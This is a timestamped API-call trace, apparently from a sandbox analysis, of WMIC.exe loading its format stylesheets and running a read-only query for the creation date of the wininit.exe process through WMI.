[0562.956] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.956] free (_Block=0x189420)
[0562.956] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x80070001c)) returned 0x0
[0562.956] malloc (_Size=0x18) returned 0x189420
[0562.957] malloc (_Size=0x18) returned 0x189440
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="TABLE") returned 0x5
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="XML") returned 0x3
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="texttablewsys") returned 0xd
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] SysStringLen (param_1="htable-sortby.xsl") returned 0x11
[0562.957] SysStringLen (param_1="XML") returned 0x3
[0562.957] SysStringLen (param_1="htable-sortby") returned 0xd
[0562.957] malloc (_Size=0x30) returned 0x1884c0
[0562.957] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.957] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.957] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.957] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=17, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.958] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="mof.xsl") returned 0x0
[0562.958] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.958] malloc (_Size=0x18) returned 0x189460
[0562.958] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.958] free (_Block=0x189460)
[0562.958] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x80070001c)) returned 0x0
[0562.958] malloc (_Size=0x18) returned 0x189460
[0562.958] malloc (_Size=0x18) returned 0x189480
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="TABLE") returned 0x5
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.958] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.958] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.958] malloc (_Size=0x30) returned 0x188500
[0562.959] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.959] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.959] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.959] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=18, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.959] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="mof.xsl") returned 0x0
[0562.959] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.959] malloc (_Size=0x18) returned 0x1894a0
[0562.959] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.959] free (_Block=0x1894a0)
[0562.959] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x80070001c)) returned 0x0
[0562.959] malloc (_Size=0x18) returned 0x1894a0
[0562.959] malloc (_Size=0x18) returned 0x1894c0
[0562.959] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.959] SysStringLen (param_1="TABLE") returned 0x5
[0562.959] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0562.960] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.960] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0562.960] malloc (_Size=0x30) returned 0x188540
[0562.960] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.960] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.960] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.960] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=19, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.960] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.960] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.960] malloc (_Size=0x18) returned 0x1894e0
[0562.961] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.961] free (_Block=0x1894e0)
[0562.961] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x80070001c)) returned 0x0
[0562.961] malloc (_Size=0x18) returned 0x1894e0
[0562.961] malloc (_Size=0x18) returned 0x189500
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="TABLE") returned 0x5
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.961] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.962] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.962] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.962] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.962] malloc (_Size=0x30) returned 0x188580
[0562.962] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.962] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.962] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.962] IXMLDOMNodeList:get_item (in: This=0x1fd9cc0, index=20, listItem=0xaf5b0 | out: listItem=0xaf5b0*=0x1fdbd50) returned 0x0
[0562.962] IXMLDOMNode:get_text (in: This=0x1fdbd50, text=0xaf5c0 | out: text=0xaf5c0*="textvaluelist.xsl") returned 0x0
[0562.962] IXMLDOMNode:get_attributes (in: This=0x1fdbd50, attributeMap=0xaf5b8 | out: attributeMap=0xaf5b8*=0x1fd78d0) returned 0x0
[0562.962] malloc (_Size=0x18) returned 0x189520
[0562.962] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x1fd78d0, name="KEYWORD", namedItem=0xaf5c8 | out: namedItem=0xaf5c8*=0x1fda280) returned 0x0
[0562.963] free (_Block=0x189520)
[0562.963] IXMLDOMNode:get_nodeValue (in: This=0x1fda280, value=0xaf600 | out: value=0xaf600*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x80070001c)) returned 0x0
[0562.963] malloc (_Size=0x18) returned 0x189520
[0562.963] malloc (_Size=0x18) returned 0x189540
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="TABLE") returned 0x5
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0562.963] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0562.963] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0562.963] malloc (_Size=0x30) returned 0x1885c0
[0562.964] IUnknown:Release (This=0x1fdbd50) returned 0x0
[0562.964] IUnknown:Release (This=0x1fd78d0) returned 0x0
[0562.964] IUnknown:Release (This=0x1fda280) returned 0x0
[0562.964] IUnknown:Release (This=0x1fd9cc0) returned 0x0
[0562.964] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fdbc50) returned 0x1
[0562.964] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fd71d0) returned 0x0
[0562.964] free (_Block=0x189040)
[0562.964] GetCommandLineW () returned="WMIC PROCESS where name=\"wininit.exe\" get creationdate "
[0562.965] malloc (_Size=0x80) returned 0x186e60
[0562.965] memcpy_s (in: _Destination=0x186e60, _DestinationSize=0x7e, _Source=0x272718, _SourceSize=0x70 | out: _Destination=0x186e60) returned 0x0
[0562.965] malloc (_Size=0x18) returned 0x189040
[0562.965] malloc (_Size=0x18) returned 0x189560
[0562.965] malloc (_Size=0x18) returned 0x189580
[0562.966] malloc (_Size=0x18) returned 0x1895a0
[0562.966] malloc (_Size=0x80) returned 0x18cb50
[0562.966] GetLocalTime (in: lpSystemTime=0xaf770 | out: lpSystemTime=0xaf770*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x23, wSecond=0x2e, wMilliseconds=0x3df))
[0562.966] _vsnwprintf (in: _Buffer=0x18cb50, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xaf6c8 | out: _Buffer="06-03-2024T11:36:15") returned 19
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0x6a) returned 0x18cbe0
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0x6a) returned 0x18cc60
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0x10) returned 0x1895c0
[0562.966] lstrlenW (lpString="PROCESS") returned 7
[0562.966] _wcsicmp (_String1="PROCESS", _String2="\"NULL\"") returned 78
[0562.966] malloc (_Size=0x10) returned 0x1895e0
[0562.966] malloc (_Size=0x8) returned 0x18cce0
[0562.966] free (_Block=0x0)
[0562.966] free (_Block=0x1895c0)
[0562.966] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.966] malloc (_Size=0xc) returned 0x1895c0
[0562.966] lstrlenW (lpString="where") returned 5
[0562.966] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85
[0562.966] malloc (_Size=0xc) returned 0x189600
[0562.966] malloc (_Size=0x10) returned 0x189620
[0562.966] memmove_s (in: _Destination=0x189620, _DestinationSize=0x8, _Source=0x18cce0, _SourceSize=0x8 | out: _Destination=0x189620) returned 0x0
[0562.966] free (_Block=0x18cce0)
[0562.966] free (_Block=0x0)
[0562.966] free (_Block=0x1895c0)
[0562.967] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.967] lstrlenW (lpString="WHERE") returned 5
[0562.967] lstrlenW (lpString="where") returned 5
[0562.967] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0562.967] malloc (_Size=0x26) returned 0x18cce0
[0562.967] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0562.967] _wcsicmp (_String1="name=\"wininit.exe\"", _String2="\"NULL\"") returned 76
[0562.967] malloc (_Size=0x26) returned 0x18cd10
[0562.967] malloc (_Size=0x18) returned 0x1895c0
[0562.967] memmove_s (in: _Destination=0x1895c0, _DestinationSize=0x10, _Source=0x189620, _SourceSize=0x10 | out: _Destination=0x1895c0) returned 0x0
[0562.967] free (_Block=0x189620)
[0562.967] free (_Block=0x0)
[0562.967] free (_Block=0x18cce0)
[0562.967] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.967] malloc (_Size=0x8) returned 0x18cce0
[0562.967] lstrlenW (lpString="get") returned 3
[0562.967] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
[0562.968] malloc (_Size=0x8) returned 0x18cd40
[0562.968] malloc (_Size=0x20) returned 0x18cd60
[0562.968] memmove_s (in: _Destination=0x18cd60, _DestinationSize=0x18, _Source=0x1895c0, _SourceSize=0x18 | out: _Destination=0x18cd60) returned 0x0
[0562.968] free (_Block=0x1895c0)
[0562.968] free (_Block=0x0)
[0562.968] free (_Block=0x18cce0)
[0562.968] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.968] malloc (_Size=0x1a) returned 0x18cce0
[0562.968] lstrlenW (lpString="creationdate") returned 12
[0562.968] _wcsicmp (_String1="creationdate", _String2="\"NULL\"") returned 65
[0562.968] malloc (_Size=0x1a) returned 0x18cd90
[0562.968] malloc (_Size=0x30) returned 0x188600
[0562.968] memmove_s (in: _Destination=0x188600, _DestinationSize=0x20, _Source=0x18cd60, _SourceSize=0x20 | out: _Destination=0x188600) returned 0x0
[0562.968] free (_Block=0x18cd60)
[0562.968] free (_Block=0x0)
[0562.968] free (_Block=0x18cce0)
[0562.968] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0562.969] malloc (_Size=0x28) returned 0x18cce0
[0562.969] lstrlenW (lpString="QUIT") returned 4
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 1
[0562.969] lstrlenW (lpString="EXIT") returned 4
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3
[0562.969] free (_Block=0x18cce0)
[0562.969] WbemLocator:IUnknown:AddRef (This=0x29cc20) returned 0x2
[0562.969] malloc (_Size=0x28) returned 0x18cce0
[0562.969] lstrlenW (lpString="/") returned 1
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="/", cchCount2=1) returned 3
[0562.969] lstrlenW (lpString="-") returned 1
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="-", cchCount2=1) returned 3
[0562.969] lstrlenW (lpString="CLASS") returned 5
[0562.969] lstrlenW (lpString="PROCESS") returned 7
[0562.969] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3
[0562.970] lstrlenW (lpString="PATH") returned 4
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.970] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3
[0562.970] lstrlenW (lpString="CONTEXT") returned 7
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.970] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.970] malloc (_Size=0x10) returned 0x1895c0
[0562.970] lstrlenW (lpString="PROCESS") returned 7
[0562.973] GetCurrentThreadId () returned 0x440
[0562.973] ??0CHString@@QEAA@XZ () returned 0xaf580
[0562.973] malloc (_Size=0x18) returned 0x189620
[0562.974] malloc (_Size=0x18) returned 0x189640
[0562.974] WbemLocator:IWbemLocator:ConnectServer (in: This=0x29cc20, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffad2998 | out: ppNamespace=0xffad2998*=0x308880) returned 0x0
[0563.029] free (_Block=0x189640)
[0563.029] free (_Block=0x189620)
[0563.030] CoSetProxyBlanket (pProxy=0x308880, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0563.030] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.030] GetCurrentThreadId () returned 0x440
[0563.030] ??0CHString@@QEAA@XZ () returned 0xaf418
[0563.030] malloc (_Size=0x18) returned 0x189620
[0563.030] malloc (_Size=0x18) returned 0x189640
[0563.030] malloc (_Size=0x18) returned 0x189660
[0563.030] malloc (_Size=0x18) returned 0x189680
[0563.030] SysStringLen (param_1="root\\cli") returned 0x8
[0563.030] SysStringLen (param_1="\\") returned 0x1
[0563.030] memcpy (in: _Dst=0x31ee88, _Src=0x31ee28, _Size=0x12 | out: _Dst=0x31ee88) returned 0x31ee88
[0563.030] memcpy (in: _Dst=0x31ee98, _Src=0x31edc8, _Size=0x4 | out: _Dst=0x31ee98) returned 0x31ee98
[0563.030] malloc (_Size=0x18) returned 0x1896a0
[0563.030] SysStringLen (param_1="root\\cli\\") returned 0x9
[0563.030] SysStringLen (param_1="ms_409") returned 0x6
[0563.031] memcpy (in: _Dst=0x286718, _Src=0x31ee88, _Size=0x14 | out: _Dst=0x286718) returned 0x286718
[0563.031] memcpy (in: _Dst=0x28672a, _Src=0x31edf8, _Size=0xe | out: _Dst=0x28672a) returned 0x28672a
[0563.031] free (_Block=0x189680)
[0563.031] free (_Block=0x189660)
[0563.031] free (_Block=0x189640)
[0563.031] free (_Block=0x189620)
[0563.031] malloc (_Size=0x18) returned 0x189620
[0563.031] WbemLocator:IWbemLocator:ConnectServer (in: This=0x29cc20, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffad29a0 | out: ppNamespace=0xffad29a0*=0x3089a0) returned 0x0
[0563.046] free (_Block=0x189620)
[0563.046] free (_Block=0x1896a0)
[0563.046] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.046] GetCurrentThreadId () returned 0x440
[0563.047] ??0CHString@@QEAA@XZ () returned 0xaf590
[0563.047] malloc (_Size=0x18) returned 0x1896a0
[0563.047] malloc (_Size=0x18) returned 0x189620
[0563.047] malloc (_Size=0x18) returned 0x189640
[0563.047] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0563.047] malloc (_Size=0x3a) returned 0x18cdc0
[0563.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x18cdc0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0563.048] free (_Block=0x18cdc0)
[0563.048] malloc (_Size=0x18) returned 0x189660
[0563.048] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0563.048] SysStringLen (param_1="PROCESS") returned 0x7
[0563.048] memcpy (in: _Dst=0x2d6ed8, _Src=0x2a42a8, _Size=0x3a | out: _Dst=0x2d6ed8) returned 0x2d6ed8
[0563.048] memcpy (in: _Dst=0x2d6f10, _Src=0x31ee28, _Size=0x10 | out: _Dst=0x2d6f10) returned 0x2d6f10
[0563.048] malloc (_Size=0x18) returned 0x189680
[0563.048] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0563.048] SysStringLen (param_1="'") returned 0x1
[0563.048] memcpy (in: _Dst=0x2d6e68, _Src=0x2d6ed8, _Size=0x48 | out: _Dst=0x2d6e68) returned 0x2d6e68
[0563.048] memcpy (in: _Dst=0x2d6eae, _Src=0x31ee88, _Size=0x4 | out: _Dst=0x2d6eae) returned 0x2d6eae
[0563.048] free (_Block=0x189660)
[0563.048] free (_Block=0x189640)
[0563.049] free (_Block=0x189620)
[0563.049] free (_Block=0x1896a0)
[0563.049] IWbemServices:GetObject (in: This=0x308880, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0xaf598*=0x0, ppCallResult=0x0 | out: ppObject=0xaf598*=0x320380, ppCallResult=0x0) returned 0x0
[0563.087] malloc (_Size=0x18) returned 0x1896a0
[0563.087] IWbemClassObject:Get (in: This=0x320380, wszName="Target", lFlags=0, pVal=0xaf4c0*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0xffad2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf4c0*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Process", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.088] free (_Block=0x1896a0)
[0563.088] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.088] malloc (_Size=0x38) returned 0x188640
[0563.088] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0563.088] malloc (_Size=0x18) returned 0x1896a0
[0563.088] IWbemClassObject:Get (in: This=0x320380, wszName="PWhere", lFlags=0, pVal=0xaf4c0*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec518, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf4c0*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE ProcessId='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.088] free (_Block=0x1896a0)
[0563.088] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0563.088] malloc (_Size=0x28) returned 0x18cd60
[0563.088] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0563.088] malloc (_Size=0x18) returned 0x1896a0
[0563.089] IWbemClassObject:Get (in: This=0x320380, wszName="Connection", lFlags=0, pVal=0xaf4c0*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec518, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf4c0*(varType=0xd, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x348940, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.089] free (_Block=0x1896a0)
[0563.089] IUnknown:QueryInterface (in: This=0x348940, riid=0xffa67360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xaf4b0 | out: ppvObject=0xaf4b0*=0x348940) returned 0x0
[0563.089] GetCurrentThreadId () returned 0x440
[0563.090] ??0CHString@@QEAA@XZ () returned 0xaf3d8
[0563.090] malloc (_Size=0x18) returned 0x1896a0
[0563.090] IWbemClassObject:Get (in: This=0x348940, wszName="Namespace", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0xffa7738f, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.090] free (_Block=0x1896a0)
[0563.090] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0563.090] malloc (_Size=0x16) returned 0x1896a0
[0563.090] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0563.090] malloc (_Size=0x18) returned 0x189620
[0563.090] IWbemClassObject:Get (in: This=0x348940, wszName="Locale", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.090] free (_Block=0x189620)
[0563.091] lstrlenW (lpString="ms_409") returned 6
[0563.091] malloc (_Size=0xe) returned 0x189620
[0563.091] lstrlenW (lpString="ms_409") returned 6
[0563.091] malloc (_Size=0x18) returned 0x189640
[0563.091] IWbemClassObject:Get (in: This=0x348940, wszName="User", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.091] free (_Block=0x189640)
[0563.091] malloc (_Size=0x18) returned 0x189640
[0563.091] IWbemClassObject:Get (in: This=0x348940, wszName="Password", lFlags=0, pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.091] free (_Block=0x189640)
[0563.091] malloc (_Size=0x18) returned 0x189640
[0563.091] IWbemClassObject:Get (in: This=0x348940, wszName="Server", lFlags=0, pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.092] free (_Block=0x189640)
[0563.092] lstrlenW (lpString=".") returned 1
[0563.092] malloc (_Size=0x4) returned 0x18cdc0
[0563.092] lstrlenW (lpString=".") returned 1
[0563.092] malloc (_Size=0x18) returned 0x189640
[0563.092] IWbemClassObject:Get (in: This=0x348940, wszName="Authority", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x1, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0x1896a0), pType=0x0, plFlavor=0x0) returned 0x0
[0563.092] free (_Block=0x189640)
[0563.092] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0563.092] IUnknown:Release (This=0x348940) returned 0x1
[0563.092] GetCurrentThreadId () returned 0x440
[0563.092] ??0CHString@@QEAA@XZ () returned 0xaf3d8
[0563.093] malloc (_Size=0x18) returned 0x189640
[0563.093] IWbemClassObject:Get (in: This=0x320380, wszName="__RELPATH", lFlags=0, pVal=0xaf400*(varType=0x0, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1=0x31edc8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0xaf400*(varType=0x8, wReserved1=0xffad, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Process\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0
[0563.093] free (_Block=0x189640)
